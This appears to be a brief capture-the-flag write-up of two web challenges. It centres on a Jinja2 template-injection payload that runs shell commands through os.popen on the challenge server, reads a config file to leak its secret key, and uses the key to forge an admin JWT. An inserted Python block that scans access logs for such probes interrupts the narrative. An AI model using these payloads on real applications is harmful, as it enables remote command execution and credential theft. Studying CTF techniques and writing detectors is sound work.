SuSec CTF write-up

2020. 3. 17. 17:34

2018 @ Yeouido Hangang Park, Seoul, Korea

Sorry for my bad English, foreigners lol :0

Web

web0

We can get the source, which uses the Node.js Express engine. There is a mechanism that compares 'first' and 'second' in the POST handler. By sending arrays as 'first' and 'second', you get the flag!

Microservice

We can access a very simple web service. You can log in, get the flag, and change the theme of the service. After many tries at attacking the JWT token, I found an SSTI on the 404 page.

As soon as I found this, I really screamed. For real. It was a waste of time trying to attack the JWT authentication. Just keep trying SSTI.

[*] url : http://66.172.11.208:5000/{{config.__class__.__init__.__globals__['os'].popen('ls -al').read()}}

Okay, we can use the SSTI to run commands.
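As an added example (not part of the original write-up), here is a small defender-side detector that scans web-server access-log lines for Jinja2-style SSTI probes like the one above: it URL-decodes each request path and flags template delimiters and dunder attribute chains, keeping the response status because here the injectable template was the 404 page. The log lines, IPs and timestamps are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format); the first two carry
# the kind of payload this write-up used, the rest are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2020:17:30:01 +0900] "GET /%7B%7Bconfig.__class__.__init__.__globals__%5B'os'%5D.popen('ls%20-al').read()%7D%7D HTTP/1.1" 404 812 "-" "curl/7.64.1"
10.0.0.5 - - [17/Mar/2020:17:31:12 +0900] "GET /{{7*7}} HTTP/1.1" 404 310 "-" "curl/7.64.1"
10.0.0.7 - - [17/Mar/2020:17:31:40 +0900] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Mar/2020:17:32:05 +0900] "GET /theme/dark HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Mar/2020:17:33:20 +0900] "GET /missing-page HTTP/1.1" 404 310 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Jinja2 expression/statement delimiters, and the dunder attribute chains used
# to walk from a harmless object (here: config) to os.popen, as in the payload above.
DELIM_RE = re.compile(r'\{\{|\{%')
DUNDER_RE = re.compile(r'__[A-Za-z]+__')


def decode_path(path):
    """URL-decode twice so a double-encoded probe is inspected in clear text."""
    return unquote(unquote(path))


def classify_request(path):
    """Return the SSTI indicators found in the decoded path (empty list if clean)."""
    decoded = decode_path(path)
    reasons = []
    if DELIM_RE.search(decoded):
        reasons.append("template-delimiters")
    if DUNDER_RE.search(decoded):
        reasons.append("dunder-attribute")
    return reasons


def scan_log(text):
    """Return (ip, decoded_path, status, reasons) for each request that looks like an SSTI probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        reasons = classify_request(m.group("path"))
        if reasons:
            # 404s carrying template syntax deserve priority in triage: that is where
            # the injectable template lived in this write-up.
            hits.append((m.group("ip"), decode_path(m.group("path")),
                         int(m.group("status")), reasons))
    return hits
```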

[*] http://66.172.11.208:5000/{{config.__class__.__init__.__globals__['os'].popen('cat config.json').read()}}

I got the secret key of this microservice. Just use it in your JWT token with admin privileges.

[*] payload : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQyNzkxMjAsIm5iZiI6MTU4NDI3OTEyMCwianRpIjoiNzEwZTJiMjQtZjUzYy00NmQ1LWFjMTgtMTMwODUyNDllNWNhIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9.s3ppGGNMSIQc4HBbhBFb5TjxdBBqVAo0jKD_nhH8RBY

Haha, we got the flag!!